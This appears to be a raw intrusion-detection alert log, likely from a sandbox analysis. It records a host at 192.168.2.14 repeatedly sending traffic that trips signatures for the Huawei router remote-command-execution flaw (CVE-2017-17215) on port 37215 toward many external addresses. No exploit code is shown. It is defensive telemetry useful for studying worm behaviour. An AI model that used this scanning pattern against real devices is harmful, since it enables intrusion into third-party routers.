                                                        06/13/24-21:31:57.093531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5716037215192.168.2.1441.24.86.92
                                                        06/13/24-21:33:02.914524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022837215192.168.2.1441.178.141.86
                                                        06/13/24-21:32:40.376202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689237215192.168.2.1441.233.126.192
                                                        06/13/24-21:33:15.276820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200037215192.168.2.14156.153.96.81
                                                        06/13/24-21:33:00.885110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5853837215192.168.2.14197.222.187.113
                                                        06/13/24-21:32:50.611448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5243037215192.168.2.1441.79.93.176
                                                        06/13/24-21:33:09.090485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3682837215192.168.2.14197.24.54.153
                                                        06/13/24-21:32:21.785716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5261037215192.168.2.14197.55.22.192
                                                        06/13/24-21:31:59.197679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4071037215192.168.2.14197.142.93.6
                                                        06/13/24-21:32:03.297098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6021637215192.168.2.1441.191.40.211
                                                        06/13/24-21:32:03.278095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3432437215192.168.2.1441.177.114.51
                                                        06/13/24-21:32:40.353756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155237215192.168.2.14197.116.243.216
                                                        06/13/24-21:33:17.306651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3299437215192.168.2.14197.249.225.202
                                                        06/13/24-21:32:38.322209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4134437215192.168.2.14197.103.7.6
                                                        06/13/24-21:32:56.791575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3624037215192.168.2.1441.183.4.194
                                                        06/13/24-21:32:19.752274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4904437215192.168.2.14197.101.42.43
                                                        06/13/24-21:33:11.156204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966237215192.168.2.14197.41.90.163
                                                        06/13/24-21:32:05.345000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4314237215192.168.2.1441.135.70.67
                                                        06/13/24-21:32:36.247016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005037215192.168.2.14156.208.54.66
                                                        06/13/24-21:32:07.402184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639037215192.168.2.1441.196.220.216
                                                        06/13/24-21:32:56.754122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4147037215192.168.2.1441.223.91.15
                                                        06/13/24-21:32:38.322671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027237215192.168.2.14197.13.105.93
                                                        06/13/24-21:33:13.214104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4685837215192.168.2.14197.167.146.121
                                                        06/13/24-21:32:46.502821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4989837215192.168.2.1441.18.216.150
                                                        06/13/24-21:31:59.174873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4702437215192.168.2.14197.127.43.8
                                                        06/13/24-21:32:30.100614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913237215192.168.2.1441.166.140.52
                                                        06/13/24-21:32:05.376951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4148237215192.168.2.14197.196.75.127
                                                        06/13/24-21:32:52.655156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739637215192.168.2.14197.250.137.223
                                                        06/13/24-21:31:57.136042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3937037215192.168.2.14156.163.66.215
                                                        06/13/24-21:32:30.100051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3365637215192.168.2.1441.154.119.50
                                                        06/13/24-21:32:42.421526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5639837215192.168.2.1441.39.177.64
                                                        06/13/24-21:31:57.093422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3758837215192.168.2.1441.180.31.80
                                                        06/13/24-21:32:25.976007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3871837215192.168.2.14156.15.109.165
                                                        06/13/24-21:32:21.781726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4578637215192.168.2.1441.240.186.174
                                                        06/13/24-21:32:19.726956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4692037215192.168.2.14156.170.125.73
                                                        06/13/24-21:32:46.524785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5675637215192.168.2.14156.111.125.206
                                                        06/13/24-21:32:52.659821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5483037215192.168.2.1441.210.97.99
                                                        06/13/24-21:32:38.303209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5216637215192.168.2.14197.123.194.145
                                                        06/13/24-21:32:32.166332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5048637215192.168.2.14156.121.252.190
                                                        06/13/24-21:32:11.510064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3722037215192.168.2.14197.192.213.14
                                                        06/13/24-21:32:34.193636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3598837215192.168.2.1441.61.89.74
                                                        06/13/24-21:32:07.402598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4190437215192.168.2.14197.84.65.3
                                                        06/13/24-21:32:21.785105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5925637215192.168.2.1441.63.201.164
                                                        06/13/24-21:32:50.633274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3799637215192.168.2.1441.144.36.197
                                                        06/13/24-21:32:28.048328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5589037215192.168.2.14197.101.52.228
                                                        06/13/24-21:32:48.571576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5137237215192.168.2.1441.251.107.53
                                                        06/13/24-21:33:07.059607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486637215192.168.2.1441.39.212.219
                                                        06/13/24-21:33:09.113706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985037215192.168.2.14156.99.248.46
                                                        06/13/24-21:33:11.174493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5137637215192.168.2.14197.196.157.20
                                                        06/13/24-21:32:48.555104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3977237215192.168.2.1441.167.90.118
                                                        06/13/24-21:32:48.567421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6081237215192.168.2.14156.62.6.49
                                                        06/13/24-21:33:05.016138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4160037215192.168.2.14156.150.99.214
                                                        06/13/24-21:32:17.671354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5071837215192.168.2.1441.240.165.198
                                                        06/13/24-21:32:46.504132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4178437215192.168.2.14197.174.188.53
                                                        06/13/24-21:32:42.418492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4390637215192.168.2.1441.87.177.92
                                                        06/13/24-21:31:59.175867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4230637215192.168.2.14197.222.41.238
                                                        06/13/24-21:32:25.974175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188637215192.168.2.14197.146.84.37
                                                        06/13/24-21:32:54.725972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5787437215192.168.2.14156.135.45.64
                                                        06/13/24-21:32:17.677272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5364037215192.168.2.1441.92.222.177
                                                        06/13/24-21:32:13.543758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338837215192.168.2.14197.37.227.66
                                                        06/13/24-21:32:46.509312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4073637215192.168.2.14197.128.85.20
                                                        06/13/24-21:32:09.437830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4304837215192.168.2.14197.12.194.111
                                                        06/13/24-21:32:07.403278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5965837215192.168.2.14156.225.15.183
                                                        06/13/24-21:32:23.942517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3817637215192.168.2.1441.168.203.37
                                                        06/13/24-21:32:30.075321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734837215192.168.2.14156.45.244.63
                                                        06/13/24-21:32:38.305472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5120037215192.168.2.14156.86.112.47
                                                        06/13/24-21:32:40.359168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863037215192.168.2.14156.218.65.132
                                                        06/13/24-21:31:59.200200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952237215192.168.2.14156.93.196.251
                                                        06/13/24-21:33:09.109393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5842037215192.168.2.14156.155.95.164
                                                        06/13/24-21:32:40.371716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308437215192.168.2.14156.34.199.217
                                                        06/13/24-21:33:04.992557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5954037215192.168.2.14197.18.179.149
                                                        06/13/24-21:32:40.357927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5163237215192.168.2.14197.11.62.154
                                                        06/13/24-21:32:34.213313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731037215192.168.2.14156.202.140.123
                                                        06/13/24-21:32:56.783683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865237215192.168.2.14197.252.76.222
                                                        06/13/24-21:32:34.193595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4943637215192.168.2.1441.23.35.44
                                                        06/13/24-21:33:07.039034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3611237215192.168.2.14156.79.86.28
                                                        06/13/24-21:32:34.194129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3629837215192.168.2.1441.19.215.238
                                                        06/13/24-21:33:07.040557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5771237215192.168.2.1441.175.156.69
                                                        06/13/24-21:32:17.675946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618237215192.168.2.14156.145.251.118
                                                        06/13/24-21:33:11.157670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4869637215192.168.2.14156.227.249.102
                                                        06/13/24-21:32:21.787609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3456637215192.168.2.14197.147.231.230
                                                        06/13/24-21:33:11.174738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5618037215192.168.2.14197.253.35.101
                                                        06/13/24-21:32:52.654874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552037215192.168.2.14156.13.112.1
                                                        06/13/24-21:32:44.477958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5720637215192.168.2.1441.51.106.106
                                                        06/13/24-21:31:57.153859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5487837215192.168.2.14156.232.82.26
                                                        06/13/24-21:32:36.242332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5612237215192.168.2.14156.194.94.232
                                                        06/13/24-21:32:58.821645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4700637215192.168.2.14197.174.146.94
                                                        06/13/24-21:32:56.758569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3948237215192.168.2.14156.1.210.141
                                                        06/13/24-21:32:44.477845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158037215192.168.2.1441.174.91.45
                                                        06/13/24-21:33:09.130183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5986637215192.168.2.14197.242.136.52
                                                        06/13/24-21:32:28.027376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5853237215192.168.2.14156.219.83.186
                                                        06/13/24-21:32:15.633827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3834437215192.168.2.14197.125.191.143
                                                        06/13/24-21:32:58.823111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3687437215192.168.2.14197.252.26.189
                                                        06/13/24-21:32:48.555698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4858237215192.168.2.14156.124.88.157
                                                        06/13/24-21:32:34.192057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4392037215192.168.2.1441.39.94.151
                                                        06/13/24-21:32:19.730983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729837215192.168.2.1441.183.181.82
                                                        06/13/24-21:32:03.309463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5273237215192.168.2.14197.144.121.147
                                                        06/13/24-21:33:05.012480TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485237215192.168.2.14197.86.217.141
                                                        06/13/24-21:31:59.175054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5331237215192.168.2.14156.51.67.83
                                                        06/13/24-21:32:23.833798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4612237215192.168.2.1441.82.167.68
                                                        06/13/24-21:32:44.476852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4390837215192.168.2.14156.110.191.95
                                                        06/13/24-21:33:15.274810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433437215192.168.2.14156.85.168.96
                                                        06/13/24-21:33:17.340972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4764437215192.168.2.14197.172.3.223
                                                        06/13/24-21:33:07.041800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3413637215192.168.2.14197.199.112.188
                                                        06/13/24-21:31:59.177091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5071237215192.168.2.14156.137.82.107
                                                        06/13/24-21:32:25.978030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4893637215192.168.2.14197.12.57.199
                                                        06/13/24-21:32:44.475748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3517637215192.168.2.14197.17.7.119
                                                        06/13/24-21:32:19.729446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5007437215192.168.2.1441.155.232.128
                                                        06/13/24-21:32:30.096856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6089637215192.168.2.14197.19.239.32
                                                        06/13/24-21:32:50.610106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3941437215192.168.2.1441.30.227.2
                                                        06/13/24-21:32:30.128917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5326837215192.168.2.14156.92.49.228
                                                        06/13/24-21:32:40.374726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3889037215192.168.2.14197.212.92.225
                                                        06/13/24-21:32:21.802577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4458037215192.168.2.1441.229.57.68
                                                        06/13/24-21:32:30.125554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4221037215192.168.2.14156.132.183.4
                                                        06/13/24-21:32:42.423499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6055437215192.168.2.14156.104.114.150
                                                        06/13/24-21:32:32.151809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3611437215192.168.2.14156.41.144.249
                                                        06/13/24-21:31:57.093920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834037215192.168.2.1441.30.140.229
                                                        06/13/24-21:31:59.194620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5280437215192.168.2.1441.111.224.37
                                                        06/13/24-21:31:57.133569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5267437215192.168.2.1441.220.170.126
                                                        06/13/24-21:32:09.457019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4467637215192.168.2.1441.181.50.196
                                                        06/13/24-21:32:07.404145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260037215192.168.2.14197.9.17.137
                                                        06/13/24-21:32:34.193266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983837215192.168.2.14197.9.198.244
                                                        06/13/24-21:32:23.833008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575837215192.168.2.1441.51.120.99
                                                        06/13/24-21:32:44.450997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4451637215192.168.2.1441.224.183.68
                                                        06/13/24-21:32:13.569503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4758837215192.168.2.14156.13.37.188
                                                        06/13/24-21:32:09.457389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448037215192.168.2.14156.30.191.126
                                                        06/13/24-21:33:00.868686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4889437215192.168.2.14197.237.4.213
                                                        06/13/24-21:32:03.307125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3839437215192.168.2.14197.224.26.33
                                                        06/13/24-21:32:09.439973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5548037215192.168.2.1441.52.145.116
                                                        06/13/24-21:32:46.527715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5480037215192.168.2.1441.237.217.194
                                                        06/13/24-21:32:17.696691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5295037215192.168.2.14197.221.158.88
                                                        06/13/24-21:32:46.527865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4444837215192.168.2.14156.10.238.168
                                                        06/13/24-21:32:54.710796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110237215192.168.2.14197.52.158.2
                                                        06/13/24-21:32:30.076225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6091237215192.168.2.1441.76.219.71
                                                        06/13/24-21:33:02.911410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941637215192.168.2.14197.247.164.251
                                                        06/13/24-21:32:19.751255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3684437215192.168.2.1441.225.211.90
                                                        06/13/24-21:32:01.241838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3898037215192.168.2.14156.205.169.35
                                                        06/13/24-21:32:34.217391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4158837215192.168.2.14156.165.78.149
                                                        06/13/24-21:32:30.096724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4715637215192.168.2.1441.170.111.7
                                                        06/13/24-21:32:42.420815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3723237215192.168.2.14156.121.248.53
                                                        06/13/24-21:32:58.841203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3444637215192.168.2.1441.180.177.87
                                                        06/13/24-21:32:32.156323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4961237215192.168.2.1441.91.66.204
                                                        06/13/24-21:33:11.158450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5743837215192.168.2.14156.224.109.152
                                                        06/13/24-21:32:32.155114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4013437215192.168.2.14156.244.29.136
                                                        06/13/24-21:33:05.011059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4134037215192.168.2.14197.231.57.18
                                                        06/13/24-21:32:28.026404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901637215192.168.2.14197.214.80.23
                                                        06/13/24-21:32:46.528395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4541837215192.168.2.1441.110.74.96
                                                        06/13/24-21:32:36.269367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4900037215192.168.2.14156.250.50.227
                                                        06/13/24-21:31:57.136115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4892037215192.168.2.14156.144.135.207
                                                        06/13/24-21:32:46.503530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336437215192.168.2.14156.38.166.199
                                                        06/13/24-21:32:42.419267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5001637215192.168.2.14197.107.36.187
                                                        06/13/24-21:32:48.551376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5401637215192.168.2.1441.212.73.48
                                                        06/13/24-21:32:52.677895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3363837215192.168.2.1441.160.240.80
                                                        06/13/24-21:32:15.631014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5878037215192.168.2.14197.72.174.246
                                                        06/13/24-21:32:38.321593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4879637215192.168.2.1441.171.168.77
                                                        06/13/24-21:32:30.075531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3873037215192.168.2.14197.169.146.39
                                                        06/13/24-21:32:36.262980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3526037215192.168.2.1441.205.166.198
                                                        06/13/24-21:32:09.458282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199437215192.168.2.14156.40.134.223
                                                        06/13/24-21:32:15.607833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5264637215192.168.2.14156.182.14.45
                                                        06/13/24-21:33:07.055747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382037215192.168.2.14197.27.130.138
                                                        06/13/24-21:32:19.726651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5475037215192.168.2.14156.113.40.149
                                                        06/13/24-21:32:25.970977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5818237215192.168.2.14197.7.216.136
                                                        06/13/24-21:31:59.175204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5940637215192.168.2.14156.113.81.8
                                                        06/13/24-21:32:17.693995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5411637215192.168.2.14156.74.1.31
                                                        06/13/24-21:32:21.804575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574437215192.168.2.14156.232.234.160
                                                        06/13/24-21:32:32.155970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5417837215192.168.2.14156.184.1.161
                                                        06/13/24-21:33:09.111430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376437215192.168.2.14156.98.236.240
                                                        06/13/24-21:32:30.125150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313637215192.168.2.14197.71.211.23
                                                        06/13/24-21:33:04.993371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5636637215192.168.2.14156.138.116.232
                                                        06/13/24-21:32:44.458433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3539437215192.168.2.14197.170.167.80
                                                        06/13/24-21:32:34.195257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5319837215192.168.2.14197.13.177.214
                                                        06/13/24-21:32:34.214445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777437215192.168.2.1441.103.11.208
                                                        06/13/24-21:32:48.553136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3978637215192.168.2.14156.72.67.189
                                                        06/13/24-21:32:34.194395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3787437215192.168.2.14197.15.101.170
                                                        06/13/24-21:32:54.726692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4184837215192.168.2.14197.119.153.192
                                                        06/13/24-21:32:15.634245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4899237215192.168.2.14156.2.63.43
                                                        06/13/24-21:33:05.012158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3643437215192.168.2.1441.128.139.168
                                                        06/13/24-21:32:19.729599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838237215192.168.2.1441.25.70.39
                                                        06/13/24-21:32:44.478554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3878237215192.168.2.1441.2.204.161
                                                        06/13/24-21:32:50.633024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3780637215192.168.2.1441.108.136.82
                                                        06/13/24-21:32:07.420215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5469037215192.168.2.14156.181.84.179
                                                        06/13/24-21:33:07.055445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4540037215192.168.2.1441.50.26.26
                                                        06/13/24-21:31:57.093021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4186437215192.168.2.1441.39.14.181
                                                        06/13/24-21:32:07.403543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4122237215192.168.2.14197.46.74.13
                                                        06/13/24-21:32:38.302076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690837215192.168.2.1441.40.111.85
                                                        06/13/24-21:32:34.215806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176237215192.168.2.1441.252.181.9
